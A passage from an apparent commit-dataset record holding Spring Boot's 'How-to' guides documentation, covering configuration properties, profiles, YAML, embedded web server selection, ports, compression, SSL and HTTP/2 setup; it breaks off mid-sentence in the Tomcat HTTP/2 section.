gh-17968\n","repos":"philwebb\/spring-boot,chrylis\/spring-boot,rweisleder\/spring-boot,tiarebalbi\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,htynkn\/spring-boot,NetoDevel\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,NetoDevel\/spring-boot,royclarkson\/spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,eddumelendez\/spring-boot,yangdd1205\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,tiarebalbi\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,chrylis\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot,NetoDevel\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,aahlenst\/spring-boot,vpavic\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,wilkinsona\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,joshiste\/spring-boot,vpavic\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,mbenson\/spring-boot,eddumelendez\/spring-boot,ilayaperumalg\/spring-boot,spring-projects\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,NetoDevel\/spring-boot,aahlenst\/spring-boot,NetoDevel\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,ilayaperumalg\/spring-boot,shakuzen\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,tiarebalbi\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,jxblum\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot,shakuzen\/spring-boot,eddumelendez\/spring-boot,yangdd1205\/spring-boot,spring-projects\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,shakuzen\/spring-boot,htynkn\/spring-boot,yangdd1205\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,Buzzardo\/spring-boot,royclarkson\/spring-boot,mbenson\/spring-boot,rweisleder\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,chrylis\/spring-boot,rweisleder\/spring-boot,ilayaperumalg\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,rweisleder\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,wilkinsona\/spring-boot,scottfrederick\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' questions\nthat often arise when using Spring Boot. 
Its coverage is not exhaustive, but it\ndoes cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out\nhttps:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer. This is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe are also more than happy to extend this section. If you want to add a '`how-to`',\nsend us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\n\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\nin a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such an analyzer for application-context-related exceptions, JSR-303\nvalidations, and more. You can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. If, for whatever reason, you cannot handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer`\ncan simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but\nsometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You can see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` (see <<production-ready-features.adoc,the Actuator chapter>>),\nthere is also a `conditions` endpoint that renders the report in JSON. Use that endpoint\nto debug the application and see what features have been added (and which have not been\nadded) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. When\nreading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources. Pay special\nattention to the `+@Conditional*+` annotations to find out what features they enable and\nwhen. Add `--debug` to the command line or a System property `-Ddebug` to get a log on the\nconsole of all the auto-configuration decisions that were made in your app. 
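+\nFor example, either of the following (the jar name `myapp.jar` is a placeholder):\n+\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n\t$ java -Ddebug -jar myapp.jar\n----\n+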
In a running\nActuator app, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX\nequivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\nand read from there the available external configuration options. The\n`@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to\nexternal properties. Thus, `ServerProperties` has `prefix=\"server\"` and its configuration\nproperties are `server.port`, `server.address`, and others. In a running Actuator app,\nlook at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values\nexplicitly out of the `Environment` in a relaxed manner. It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\nresponse to SpEL expressions, normally evaluated with placeholders resolved from the\n`Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. There is more\nthan one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers`\nmethods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or\n`context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging\na jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some\neven before the context is created) and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n\"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>`\" in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed by using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, the following example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. The preceding example adds the `custom-resource` property\nsource at the end of the list so that a key defined in any of the usual other locations\ntakes precedence. 
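\nA minimal sketch of an `EnvironmentPostProcessor` along these lines (the class name and the property added are assumptions) might look as follows:\n\n[source,java,indent=0]\n----\n\timport java.util.HashMap;\n\timport java.util.Map;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.env.EnvironmentPostProcessor;\n\timport org.springframework.core.env.ConfigurableEnvironment;\n\timport org.springframework.core.env.MapPropertySource;\n\n\tpublic class CustomResourceEnvironmentPostProcessor implements EnvironmentPostProcessor {\n\n\t\t@Override\n\t\tpublic void postProcessEnvironment(ConfigurableEnvironment environment, SpringApplication application) {\n\t\t\tMap<String, Object> map = new HashMap<>();\n\t\t\tmap.put(\"custom.property\", \"value\"); \/\/ arbitrary example key and value\n\t\t\t\/\/ addLast(...) appends the source, so the usual locations keep precedence\n\t\t\tenvironment.getPropertySources().addLast(new MapPropertySource(\"custom-resource\", map));\n\t\t}\n\n\t}\n----\n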
A custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a\nconvenient and easy way to load a custom resource in the `Environment`, we do not\nrecommend it, because Spring Boot prepares the `Environment` before the\n`ApplicationContext` is refreshed. Any key defined with `@PropertySource` is loaded too\nlate to have any effect on auto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `SpringApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\"\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method but also bootstrap a Spring application to set up\nthe infrastructure to use, you can use the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class, depending on whether\nit thinks it needs a web application or not. The first thing you can do to help it is to\nleave server-related dependencies (such as the servlet API) off the classpath. If you cannot do\nthat (for example, you run two applications from the same code base), then you can\nexplicitly call `setWebApplicationType(WebApplicationType.NONE)` on your\n`SpringApplication` instance or set the `applicationContextClass` property (through the\nJava API or with external properties). Application code that you want to run as your\nbusiness logic can be implemented as a `CommandLineRunner` and dropped into the context as\na `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\n\nThis section includes topics about setting and reading properties and configuration\nsettings and their interaction with Spring Boot applications.\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them by instead using the existing build\nconfiguration. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource\nfiltering. If you use the `spring-boot-starter-parent`, you can then refer to your\nMaven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is\napplied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add\n`src\/main\/resources` directly to the classpath (for hot reloading purposes). Doing so\ncircumvents the resource filtering and this feature. Instead, you can use the `exec:java`\ngoal or customize the plugin's configuration. 
See the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside\nthe `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring\nplaceholders (such as `$\\{placeholder}`) in your configuration. If that property is not\nset to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the\nfollowing example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion, escape\nthe Spring property placeholders as follows: `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of `SpringApplication`\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as\nyou create the application to modify its behavior. Alternatively, you can externalize the\nconfiguration by setting properties in `+spring.main.*+`. 
For example, in\n`application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application does not start\nan embedded web server.\n\nProperties defined in external configuration override the values specified with the Java\nAPI, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses\nthree sources for the `ApplicationContext` (in the following order): `demo.MyApp`,\n`com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a\ndefined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this ordering is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods and those added using `setSources()` are inspected to see if they have\n`@PropertySources`. If they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower priority than any added by using the default locations (such as\n`application.properties`), system properties, environment variables, or the command line.\n\nYou can also provide the following System properties (or environment variables) to change\nthe behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`): Defaults to `application` as the root of\nthe file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`): The file to load (such as a\nclasspath resource or a URL). A separate `Environment` property source is set up for this\ndocument, and it can be overridden by system properties, environment variables, or the\ncommand line.\n\nNo matter what you set in the environment, Spring Boot always loads\n`application.properties` as described above. By default, if YAML is used, then files with\nthe '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the\ncandidates it has not found at the `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. 
You can enable this behavior by using\nplaceholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugin` has been changed from `+${*}+` to `@` (that is,\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled Maven filtering for `application.properties`\ndirectly, you may also want to change the default filter token to use\nhttps:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other\ndelimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku\nor Cloud Foundry. On those two platforms, the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external\nproperties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis one level deep and has period-separated keys, as many people are used to with\n`Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`).\nAlso, you can launch your application with a `-D` argument (remember to put it before the\nmain class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown\nin the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting\nbut not by the `SpringApplicationBuilder.profiles()` method. 
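\nFor example, the following sketch (the main class name is an assumption) adds a profile on top of whatever `spring.profiles.active` resolves to:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder(MyApplication.class)\n\t\t\/\/ \"extra\" is added to, not replacing, any profiles set externally\n\t\t.profiles(\"extra\")\n\t\t.run(args);\n----\n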
Thus, the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in\nthe \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(a comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` method. If any of those profiles is active, that document\nis included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000. However, if the Spring profile called\n'`development`' is active, then the port is 9001. If '`production`' is active, then the\nport is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered. Later\nvalues override earlier values.\n\nTo do the same thing with properties files, you can use\n`application-$\\{profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and\nother places) into an application at runtime. There is not (and technically cannot be) an\nexhaustive list of all supported properties in a single location, because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations as well as the occasional use of\n`Binder`. For more about the exact ordering of loading properties, see\n\"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\n\nEach Spring Boot web application includes an embedded web server. This feature leads to a\nnumber of how-to questions, including how to change the embedded server and how to\nconfigure the embedded server. 
This section answers those questions.\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including\n`spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or\n`spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty\nby including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`,\n`spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies\nin addition to including the one you need. Spring Boot provides separate starters for\nHTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow\n2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring\nWebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\t\/\/ exclude Reactor Netty\n\t\tcompile.exclude module: 'spring-boot-starter-reactor-netty'\n\t}\n\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-webflux'\n\t\t\/\/ Use Undertow instead\n\t\tcompile 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so\nyou may need to keep a dependency on Netty even when you include a different HTTP\nserver.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will\nautomatically start it. To disable this behavior, configure the `WebApplicationType` in\nyour `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with\n`server.port` (for example, in `application.properties` or as a System property). Thanks\nto relaxed binding of `Environment` values, you can also use `SERVER_PORT` (for example,\nas an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`,\nuse `server.port=-1`. 
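\nFor example, in `application.properties`:\n\n[source,properties,indent=0]\n----\n\tserver.port=-1\n----\n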
(Doing so is sometimes useful for testing.)\n\nFor more details, see\n\"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\"\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the\n`ServletWebServerApplicationContext` through its `WebServer`. The best way to get that and\nbe sure that it has been initialized is to add a `@Bean` of type\n`ApplicationListener<ServletWebServerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field by using the `@LocalServerPort` annotation, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Do not try\nto inject the port in a regular application. As we just saw, the value is set only after\nthe container has been initialized. Contrary to a test, application code callbacks are\nprocessed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nin `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. You can configure this behavior by setting the\n`server.compression.min-response-size` property.\n\nBy default, responses are compressed only if their content type is one of the\nfollowing:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the `server.compression.mime-types` property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. The following example shows\nsetting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/web\/server\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration such as the preceding example means the application no longer supports\na plain HTTP connector at port 8080. 
Spring Boot does not support the configuration of\nboth an HTTP connector and an HTTPS connector through `application.properties`. If you\nwant to have both, you need to configure one of them programmatically. We recommend using\n`application.properties` to configure HTTPS, as the HTTP connector is the easier of the\ntwo to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the\n`+server.http2.enabled+` configuration property. This support depends on the chosen web\nserver and the application environment, since that protocol is not supported\nout of the box by JDK 8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol. As a\nresult, you must <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0, HTTP\/2 is supported without any additional requirements on JDK 8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the\nhttps:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies:\n`org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x, which supports HTTP\/2 out of the box when\nusing JDK 9 or later. Alternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative`\nlibrary and its dependencies are 